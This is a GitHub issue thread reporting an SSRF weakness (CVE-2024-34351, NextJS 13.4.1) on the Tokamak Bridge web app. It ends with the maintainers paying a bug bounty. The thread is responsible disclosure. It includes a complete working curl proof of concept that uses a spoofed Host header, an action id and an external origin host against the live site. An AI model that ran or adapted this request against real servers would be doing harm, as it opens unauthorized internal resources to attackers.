tokamak-network / tokamak-bridge

An interface designed to bridge assets between Titan and Ethereum chains.
https://app.bridge.tokamak.network
6 stars 0 forks

[Bugs]: SSRF vulnerability present on "app.bridge.tokamak.network" #242

Closed blackcow1987 closed 3 weeks ago

blackcow1987 commented 1 month ago

Can you specify where the bug exists?

No response

What happened?

The "app.bridge.tokamak.network" is confirmed to be based on NextJS 13.4.1 and the version is vulnerable to CVE-2024-34351. Exploitation of this vulnerability can trigger an SSRF attack via an endpoint that uses redirect, and this vulnerability can be used to access unauthorized internal resources, etc. Therefore, it is recommended to update NextJS to the latest version.

I have identified an endpoint in the Tokamak Bridge code that uses redirect and can be used to trigger a vulnerability. https://github.com/tokamak-network/tokamak-bridge/blob/main/src/app/pools/increase/%5Bid%5D/page.tsx#L23 https://github.com/tokamak-network/tokamak-bridge/blob/main/src/app/pools/remove/%5Bid%5D/page.tsx#L28

A more detailed analysis of this vulnerability can be found at the link below. https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps

Which networks are you seeing the problem on? (can select multiple)

No response

Which device are you seeing the problem on? (can select multiple)

No response

Which OS are you seeing the problem on? (can select multiple)

No response

What browsers are you seeing the problem on? (can select multiple)

No response

Relevant log output

No response

Upload any screenshots to aid with explaining the bug.


blackcow1987 commented 1 month ago
curl 'https://app.bridge.tokamak.network/staking' \
  -H 'Host: simple.staking.tokamak.network' \
  -H 'Accept: text/x-component' \
  -H 'Accept-Language: ja,en-US;q=0.9,en;q=0.8' \
  -H 'Cache-Control: no-cache' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: text/plain;charset=UTF-8' \
  -H 'Next-Action: 1529e716c9db41d5ce462b285ea3d42d09292bd2' \
  -H 'Next-Router-State-Tree: %5B%22%22%2C%7B%22children%22%3A%5B%22__PAGE__%22%2C%7B%7D%5D%7D%2Cnull%2Cnull%2Ctrue%5D' \
  -H 'Origin: http://nextjs-cve-2024-34351.deno.dev' \
  -H 'Pragma: no-cache' \
  -H 'Referer: https://app.bridge.tokamak.network/pools/increase/3' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36' \
  -H 'sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "macOS"' -v

Using the above command, you can see that the server reads and returns the /staking page of simple.staking.tokamak.network specified in the Host.

Jaden-Kong commented 1 month ago

@blackcow1987 Hello, this is Jaden from Tokamak Network. After internal discussions, we are planning to reward 100 TON for your vulnerability report. If you are okay with this, please share your ERC20 address to receive the reward. If you have any further questions regarding the reward, feel free to contact me via Telegram at @Jaden_Tokamak.

Thank you.

blackcow1987 commented 4 weeks ago

@Jaden-Kong Wallet address is 0xE59d88eb24dF45e7Ef72B2af0e40714FA3277733

Jaden-Kong commented 4 weeks ago

@blackcow1987 Thank you for sharing this information. I'll take care of it by tomorrow.

Jaden-Kong commented 4 weeks ago

@blackcow1987 Completed 100 TON transfer via Titan L2.